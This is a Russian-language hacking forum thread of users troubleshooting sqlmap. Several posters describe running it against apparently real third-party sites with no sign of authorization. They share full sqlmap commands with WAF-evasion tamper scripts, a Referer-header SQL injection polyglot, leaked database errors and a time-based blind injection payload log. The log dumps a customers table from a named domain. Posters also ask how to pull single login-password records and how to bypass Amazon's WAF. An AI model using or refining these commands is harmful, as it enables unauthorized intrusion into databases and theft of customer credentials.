Вопросы по SQLMap

Discussion in 'Уязвимости' started by randman, 1 Oct 2015.

  1. RWD

    RWD Member

    Joined:
    25 Apr 2013
    Messages:
    159
    Likes Received:
    41
    Reputations:
    2

    https://github.com/sqlmapproject/sqlmap/wiki/Usage

    Turn off payload casting mechanism
    Switch: --no-cast

    When retrieving results, sqlmap uses a mechanism where all entries are being casted to string type and replaced with a whitespace character in case of NULL values. That is being made to prevent any erroneous states (e.g. concatenation of NULL values with string values) and to easy the data retrieval process itself. Nevertheless, there are reported cases (e.g. older versions of MySQL DBMS) where this mechanism needed to be turned-off (using this switch) because of problems with data retrieval itself (e.g. None values are returned back).
     
  2. NewbieOnHack

    NewbieOnHack New Member

    Joined:
    28 Sep 2019
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Спасибо, но я не понял почему я обошел фильтр этим методом(при sql запросе в url строку получал 504, что означало, что коннект дропает фильтр)
     
  3. 4sh0T

    4sh0T New Member

    Joined:
    3 Oct 2019
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    hello everyone, I'm sorry for not being able to speak Russian. I can translate if necessary but I thought I'd try it in english first.
    I got a site which is vulnerable to SQL injection, however whatever I try it doesn't exploit the vulnerability. Also the WAF blocks some payloads, so I used Atlas(https://github.com/m4ll0k/Atlas) to identify the WAF, but it didn't manage to identify it, however it suggested me some tampers to use before the WAF blocked my IP. This is the response I get when I manually type in ' behind this site:

    https://www.site.xx/xxxx/product.php?id=47' (I enter the ' myself)

    "MySQL error: 1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\\' AND p.products_status = 1 GROUP BY p.products_id' at line 1

    SELECT * FROM products AS p LEFT JOIN products_description AS pd ON p.products_id=pd.products_id WHERE p.products_id = 47\\\' AND p.products_status = 1 GROUP BY p.products_id

    TEP_DB_ERROR"

    command used:
    sqlmap -u https://www.site.xx/xxxx/product.php?id=47 --random-agent --level=5 --risk=3 --dbs --tamper=htmlencode,charunicodeencode,modsecurityversioned,modsecurityzeroversioned,multiplespaces

    Anyone knows how I could exploit?
     
  4. sosidzh24

    sosidzh24 New Member

    Joined:
    10 Apr 2019
    Messages:
    51
    Likes Received:
    3
    Reputations:
    0
    --level 5 --risk 3 -v 3 --random-agent
     
  5. sosidzh24

    sosidzh24 New Member

    Joined:
    10 Apr 2019
    Messages:
    51
    Likes Received:
    3
    Reputations:
    0
    all tested parameters do not appear to be injectable. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'
    There are no errors in payloads
     
  6. Muracha

    Muracha Member

    Joined:
    30 Jul 2011
    Messages:
    150
    Likes Received:
    10
    Reputations:
    0
    Как правильно построить запрос к базе данных через sqlmap, если мне нужна только одна запись?
    Запрос типа
    Дампит все 100500 строк, но мне нужна одно значения логина-пароля, предположим, из 666 записи и не больше.
    Как её правильно построить?
     
  7. karkajoi

    karkajoi Active Member

    Joined:
    26 Oct 2016
    Messages:
    298
    Likes Received:
    141
    Reputations:
    2
    --start=666 --stop=667 ну или через --where="email='[email protected]'", --where="id IN (1,3)",что то типо такого
     
    #947 karkajoi, 6 Oct 2019
    Last edited: 6 Oct 2019
    Muracha likes this.
  8. Imperou$

    Imperou$ Elder - Старейшина

    Joined:
    23 May 2008
    Messages:
    89
    Likes Received:
    41
    Reputations:
    0
    Я вас категорически приветствую. Вопрос, есть ли возможность настроить мап для автоматического дампа с конца базы, а не с начала. Типа start=1000 stop=1. Приходится дампить построчно, например 900-1000, 800-900, 700-800 etc, что не очень удобно. Возможно где то в settings.py либо скриптах подправить,либо какая то надстройка существует или костылями проставить какие то специфические параметры выборки в where по id при сливе, чтобы считывались данные с конца таблицы, при дампе по порядку мапом.. Подскажите, если кто озадачивался таким вопросом, периодически возникает данная необходимость...
     
  9. Sentureg

    Sentureg New Member

    Joined:
    31 Jul 2018
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Привет, может кто подскажет bypass к aws waf (Amazon)
    Или как можно обойти эту защиту?
     
  10. Baskin-Robbins

    Baskin-Robbins Well-Known Member

    Joined:
    15 Sep 2018
    Messages:
    178
    Likes Received:
    521
    Reputations:
    59
  11. vladF

    vladF New Member

    Joined:
    5 Dec 2018
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Доброго времени суток. Получил такой результат со сканера:

    This vulnerability affects /kontaktannonser/lista/.
    HTTP Header input Referer was set to if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/GET

    /kontaktannonser/lista/ HTTP/1.1
    Referer: if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/

    Как правильно составить запрос для Sqlmap?
     
  12. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,410
    Likes Received:
    796
    Reputations:
    836
    тут надо самому сначала разбираться на что ваф срабатывает, а потом тампер писать, что в самом скульмапе, там типичные тамперы
     
    _________________________
    joelblack likes this.
  13. kacergei

    kacergei Member

    Joined:
    26 May 2007
    Messages:
    225
    Likes Received:
    83
    Reputations:
    1
    Ребят кто как борится с got HTTP error code: 424 (HTTPError: Failed Dependency) ?
     
  14. Estet

    Estet New Member

    Joined:
    30 Aug 2016
    Messages:
    34
    Likes Received:
    2
    Reputations:
    0
    В чем может быть проблема, все норм извлекается, есть пустые значения, есть с записями.
    Когда пытаюсь с командой "--where" отказывается извлекать. Пробовал другие значения
    Что можно сделать?

    ./sqlmap.py -r /root/req.txt --level 5 --risk 3 --dbs --current-db -p tt --dbms=mssql -D SB -T dbo.sb_customersTB -C "Customer Group" --where "Customer Group IS NOT NULL" --dump --threads=10 -v 3

    [21:11:39] [INFO] retrieved:
    [21:11:39] [DEBUG] performed 3 queries in 1.12 seconds
    [21:11:39] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically
    [21:11:39] [PAYLOAD] (SELECT (CASE WHEN (UNICODE(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(*))) AS NVARCHAR(4000)),CHAR(32)) FROM SB.dbo.sb_customersTB WHERE Customer Group IS NOT NULL),1,1))>51) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE 1083 END))
    [21:11:39] [WARNING] time-based comparison requires larger statistical model, please wait........................... (done)
    [21:11:50] [PAYLOAD] (SELECT (CASE WHEN (UNICODE(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(*))) AS NVARCHAR(4000)),CHAR(32)) FROM SB.dbo.sb_customersTB WHERE Customer Group IS NOT NULL),1,1))>48) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE 1083 END))
    [21:11:50] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
    [21:11:50] [PAYLOAD] (SELECT (CASE WHEN (UNICODE(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(*))) AS NVARCHAR(4000)),CHAR(32)) FROM SB.dbo.sb_customersTB WHERE Customer Group IS NOT NULL),1,1))>9) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE 1083 END))
    [21:11:51] [INFO] retrieved:
    [21:11:51] [DEBUG] performed 3 queries in 11.51 seconds
    [21:11:51] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
    [21:11:51] [WARNING] unable to retrieve the number of column(s) '[Customer Group]' entries for table 'sb_customersTB' in database 'SB'
    [21:11:51] [INFO] fetched data logged to text files under '/root/.sqlmap/output/stickersbanners.com'

    [*] ending @ 21:11:51 /2019-11-02/
     
  15. karkajoi

    karkajoi Active Member

    Joined:
    26 Oct 2016
    Messages:
    298
    Likes Received:
    141
    Reputations:
    2
    943 пост в этой тебе (предыдущая страница)
     
  16. Estet

    Estet New Member

    Joined:
    30 Aug 2016
    Messages:
    34
    Likes Received:
    2
    Reputations:
    0
    Так в том то и дело, что когда используешь where, перестает извлекать. Без where, все подряд без проблем извлекается
     
  17. Estet

    Estet New Member

    Joined:
    30 Aug 2016
    Messages:
    34
    Likes Received:
    2
    Reputations:
    0
    еще такой вопрос, можно ли как то извлечь данные, по критерию: длинна содержимого колонки.
    Допустим мне нужны все строки, где длинна определенной колонки не 7 символов?
     
  18. fandor9

    fandor9 Member

    Joined:
    16 Nov 2018
    Messages:
    136
    Likes Received:
    94
    Reputations:
    5
    А вы уверены что колонка у вас называется "Customer Group", а не "Customer_Group"? Если точно с пробелом, то попробуйте поставить имя колонки в одинарные кавычки:
    Code:
    ./sqlmap.py -r /root/req.txt --level 5 --risk 3 --dbs --current-db -p tt --dbms=mssql -D SB -T dbo.sb_customersTB -C "Customer Group" --where "'Customer Group' IS NOT NULL" --dump --threads=10 -v 3
     
  19. brown

    brown New Member

    Joined:
    16 Oct 2016
    Messages:
    162
    Likes Received:
    4
    Reputations:
    0
    <div class="error-page">
    <h1>Oops - It seems the page you are looking for is not here</h1>
    <p>CDbCommand failed to execute the SQL statement: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near &#039;&#039;DLAj29&#039;&#039; order by t.id desc limit 9&#039; at line 4</p>

    не крутится( какой темпер можно заюзать?

    Yii Framework/PDO
     
  20. Estet

    Estet New Member

    Joined:
    30 Aug 2016
    Messages:
    34
    Likes Received:
    2
    Reputations:
    0
    вдруг кому будет полезно.
    тут DBMS is Microsoft SQL Server это сработало.
     
Loading...